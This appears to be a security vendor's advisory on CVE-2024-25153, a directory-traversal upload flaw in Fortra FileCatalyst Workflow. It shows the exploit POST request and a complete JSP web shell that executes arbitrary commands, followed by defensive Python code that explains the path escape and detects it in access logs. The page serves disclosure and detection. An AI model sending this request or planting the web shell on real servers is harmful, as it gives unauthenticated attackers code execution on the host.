
Fortra FileCatalyst Workflow Remote Code Execution (CVE-2024-25153)



Application Details

Fortra FileCatalyst Workflow is a web portal used to transfer files of any size, including multi-terabyte files. It lets users store files in the organisation's local storage or private cloud for collaboration.


Vulnerability

A critical unsafe file upload and directory traversal vulnerability in Fortra FileCatalyst Workflow allows a remote, unauthenticated attacker to gain remote code execution (RCE) on the web server.


Identification

A directory traversal within the 'ftpservlet' of the FileCatalyst Workflow web portal allows files to be uploaded outside of the intended 'uploadtemp' directory with a specially crafted POST request. Where a file can be placed in the web portal's DocumentRoot this way, a specially crafted JSP file is then served and executed by the application server, which is enough to plant a web shell.


POST /workflow/servlet/ftpservlet?wf=octetStream&h=example.com&u=XX&p=XX&prt=21&c=PUT&sid=CVE-2024-25153/../../CVE-2024-25153/

PAYLOAD - JSP web shell written by the request above. It runs whatever is passed in the 'cmd' query parameter (for example shell.jsp?cmd=id) and returns the command's standard output in the HTTP response:

<%@ page import="java.util.*,java.io.*"%>
<%
    // Only act when a 'cmd' parameter is supplied
    if (request.getParameter("cmd") != null) {
        // Execute the command with the privileges of the servlet container
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();   // unused, kept from the original
        InputStream in = p.getInputStream();
        // DataInputStream.readLine() is deprecated but still works; it reads stdout line by line
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while (disr != null) {
            out.println(disr);                   // echo each line of output back to the client
            disr = dis.readLine();
        }
    }
%>

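
The following is an added illustration, not Fortra's code, of why the 'sid' value in the request above lands a file in the DocumentRoot rather than in 'uploadtemp', and of the containment check that stops it. The directory layout (DOC_ROOT, UPLOAD_ROOT) and the two resolver functions (naive_target, safe_target) are assumptions made for this example; the real ftpservlet internals are not reproduced.

```python
# Added illustration (not Fortra's code): how a traversal in the ftpservlet
# 'sid' parameter escapes 'uploadtemp', and the containment check that stops it.
# The directory layout and the two resolver functions are assumptions made
# for this example; the real servlet internals are not reproduced here.
import posixpath

DOC_ROOT = "/opt/filecatalyst/webapps/workflow"   # assumed DocumentRoot
UPLOAD_ROOT = DOC_ROOT + "/uploadtemp"            # assumed intended upload dir

# sid value taken from the request shown on this page
TRAVERSAL_SID = "CVE-2024-25153/../../CVE-2024-25153/"


def naive_target(sid: str, filename: str) -> str:
    """Build the destination the way a vulnerable handler would: append the
    user-supplied sid under uploadtemp and let path normalisation collapse
    the '..' segments. Nothing checks where the result ends up."""
    return posixpath.normpath(UPLOAD_ROOT + "/" + sid + "/" + filename)


def is_inside(path: str, root: str) -> bool:
    """True if the normalised path is root itself or lies below it."""
    root = posixpath.normpath(root)
    return path == root or path.startswith(root + "/")


def safe_target(sid: str, filename: str) -> str:
    """Hardened resolver: reject separators in the filename and backslashes
    anywhere (Windows treats them as separators), then refuse any result
    that does not stay inside UPLOAD_ROOT after normalisation. String
    concatenation rather than join() means a leading '/' in sid cannot
    reset the path to an absolute location either."""
    if "/" in filename or "\\" in filename or "\\" in sid:
        raise ValueError("illegal path characters")
    if filename in ("", ".", ".."):
        raise ValueError("illegal filename")
    candidate = posixpath.normpath(UPLOAD_ROOT + "/" + sid + "/" + filename)
    if not is_inside(candidate, UPLOAD_ROOT):
        raise ValueError("path escapes upload directory: " + candidate)
    return candidate


if __name__ == "__main__":
    dest = naive_target(TRAVERSAL_SID, "shell.jsp")
    print("vulnerable resolver writes to:", dest)
    print("inside uploadtemp?", is_inside(dest, UPLOAD_ROOT))
    print("inside DocumentRoot?", is_inside(dest, DOC_ROOT))
    try:
        safe_target(TRAVERSAL_SID, "shell.jsp")
    except ValueError as err:
        print("hardened resolver:", err)
```

Two '..' segments are exactly what it takes: the first cancels the attacker-chosen 'CVE-2024-25153' segment, the second steps out of 'uploadtemp' into its parent, the DocumentRoot, where the JSP is then served. The fix is to normalise first and compare the result against the intended root, not to strip '../' substrings, which is easily bypassed.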
Detection

By turning this request into a traffic file and a matching rule, we are able to detect attempts to exploit the traversal and execute code, including the upload of web shells.
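
The matching logic below is an added example and is not Idappcom's signature 8024757, whose body is not published on this page. It flags POST requests to the ftpservlet whose 'sid' parameter contains a directory-traversal sequence, including percent-encoded, double-encoded and backslash variants. The function names (is_ftpservlet_traversal, scan_log) and the access-log lines are constructed for this example; the second line is the request shown above.

```python
# Added detection example (not Idappcom's signature 8024757, whose body is
# not published on this page): flag ftpservlet upload requests whose 'sid'
# parameter contains a directory-traversal sequence, including percent-
# encoded, double-encoded and backslash variants. The access-log lines are
# constructed for this example.
import re
from urllib.parse import parse_qs, unquote, urlsplit

# '..' bounded by a separator (or the start/end of the value)
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")
# method and target from a common-log-format request line
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing, so %252e%252e (double
    encoded) is seen as '..'. max_rounds bounds the work on hostile input."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_ftpservlet_traversal(method: str, target: str) -> bool:
    """True for a POST to .../servlet/ftpservlet whose sid walks out of
    its directory. Backslashes are folded to '/' before matching."""
    if method.upper() != "POST":
        return False
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/servlet/ftpservlet"):
        return False
    # parse_qs already applies one round of percent-decoding
    params = parse_qs(parts.query, keep_blank_values=True)
    for sid in params.get("sid", []):
        sid = fully_decode(sid).replace("\\", "/")
        if TRAVERSAL.search(sid):
            return True
    return False


def scan_log(lines):
    """Return the indices of access-log lines matching the rule."""
    hits = []
    for i, line in enumerate(lines):
        m = REQUEST_LINE.search(line)
        if m and is_ftpservlet_traversal(m.group("method"), m.group("target")):
            hits.append(i)
    return hits


# Constructed sample log (common log format); index 1 is the request from this page.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Mar/2024:10:00:01 +0000] "GET /workflow/ HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Mar/2024:10:00:02 +0000] "POST /workflow/servlet/ftpservlet?wf=octetStream&h=example.com&u=XX&p=XX&prt=21&c=PUT&sid=CVE-2024-25153/../../CVE-2024-25153/ HTTP/1.1" 200 17',
    '198.51.100.7 - - [10/Mar/2024:10:00:03 +0000] "POST /workflow/servlet/ftpservlet?c=PUT&sid=CVE-2024-25153%2F..%2F..%2FCVE-2024-25153%2F HTTP/1.1" 200 17',
    '198.51.100.7 - - [10/Mar/2024:10:00:04 +0000] "POST /workflow/servlet/ftpservlet?c=PUT&sid=%252e%252e%252f%252e%252e%252fCVE-2024-25153 HTTP/1.1" 200 17',
    '203.0.113.9 - - [10/Mar/2024:10:00:05 +0000] "POST /workflow/servlet/ftpservlet?wf=octetStream&c=PUT&sid=session123 HTTP/1.1" 200 17',
    '198.51.100.7 - - [10/Mar/2024:10:00:06 +0000] "POST /workflow/servlet/ftpservlet?c=PUT&sid=..%5c..%5cCVE-2024-25153 HTTP/1.1" 200 17',
]

if __name__ == "__main__":
    for i in scan_log(SAMPLE_LOG):
        print("ALERT ftpservlet traversal:", SAMPLE_LOG[i])
```

The normalisation steps matter more than the pattern itself: a rule that only looks for the literal string "../" in the URI misses the %2F, double-encoded and backslash forms, all of which the servlet container decodes before the application sees them. A network signature needs the same decoding of the query string, and should anchor on the ftpservlet path and the sid parameter rather than on the CVE identifier, which the attacker is free to change.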


Coverage

Idappcom have created signature 8024757 along with a traffic file for this vulnerability.


Traffic IQ

If you are concerned that your business may be at risk from this vulnerability or others, try our Traffic IQ software, which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional
